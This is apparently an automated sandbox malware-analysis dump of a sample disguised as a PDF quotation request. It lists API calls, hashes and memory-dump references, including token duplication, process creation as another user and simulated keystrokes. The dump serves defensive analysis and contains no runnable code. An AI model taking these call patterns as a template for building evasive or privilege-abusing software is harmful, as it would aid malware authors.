                                                                    • Instruction ID: f795c94f21b42bfaa1f1d864c387b497e6b2772b6b59ffbe067e85bcfecebbdf
                                                                    • Opcode Fuzzy Hash: efc549f785c575d7fc561f162d3cdf3fadd14233f012674f3910e14d59da33a7
                                                                    • Instruction Fuzzy Hash: 65316170600608EBEF509F12DA816AE7BF4FF45751F20C82AEC99CA611E738D590CB99
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                    • Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
                                                                    • Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                    • Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 0044C1F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc_memmove
                                                                    • String ID:
                                                                    • API String ID: 1183979061-0
                                                                    • Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                                    • Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
                                                                    • Opcode Fuzzy Hash: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                                    • Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __lock_file
                                                                    • String ID:
                                                                    • API String ID: 3031932315-0
                                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 004142F5
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                    • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                                    • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                    • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                    • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                                                    • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                    • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                    • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                                                    • Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                    • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wfsopen
                                                                    • String ID:
                                                                    • API String ID: 197181222-0
                                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 032622F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: 59079138a9fc49ed338b244be567448184de40e65e029ed02931d4be614867f2
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: F1E0BF7594020DEFDB00DFA8D54D6DD7BB4EF04301F1005A1FD05D7680DB309E648A62
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 032622F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 6a8d22d48e3ee7998b2016c5237d1dff28f35552d49f217676f62f7a44c92d7d
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 81E0E67594020DDFDB00DFB8D54D69D7BB4EF04301F1005A1FD01D2280D7309D608A72
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00A43660,00000000,00000000,00000000), ref: 0047CB9B
                                                                    • ImageList_BeginDrag.COMCTL32(00A43660,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                    • SendMessageW.USER32 ref: 0047CD12
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                    • SendMessageW.USER32 ref: 0047CD80
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                    • SendMessageW.USER32 ref: 0047CE93
                                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,03391B88,00000000,?,?,?,?), ref: 0047CF1C
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,03391B88,00000000,?,?,?,?), ref: 0047CFE6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3100379633-4164748364
                                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                    • IsIconic.USER32(?), ref: 0043444F
                                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 2889586943-2988720461
                                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                    APIs
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                    • _wcslen.LIBCMT ref: 00446498
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                    • String ID: $@OH$default$winsta0
                                                                    • API String ID: 3324942560-3791954436
                                                                    • Opcode ID: 10c3fb1b2ee01ec7db114f89b9bb3e6e5321ff8b0674ed723ea1126b2adc0b8e
                                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                    • Opcode Fuzzy Hash: 10c3fb1b2ee01ec7db114f89b9bb3e6e5321ff8b0674ed723ea1126b2adc0b8e
                                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                    • __swprintf.LIBCMT ref: 004789D3
                                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                                    • __swprintf.LIBCMT ref: 00478A79
                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                                    • __swprintf.LIBCMT ref: 00478B03
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 999945258-2428617273
                                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                                    • _wcscat.LIBCMT ref: 004034BC
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                                    • _wcslen.LIBCMT ref: 00403623
                                                                    • _wcslen.LIBCMT ref: 0040367D
                                                                    Strings
                                                                    • Error opening the file, xrefs: 00428231
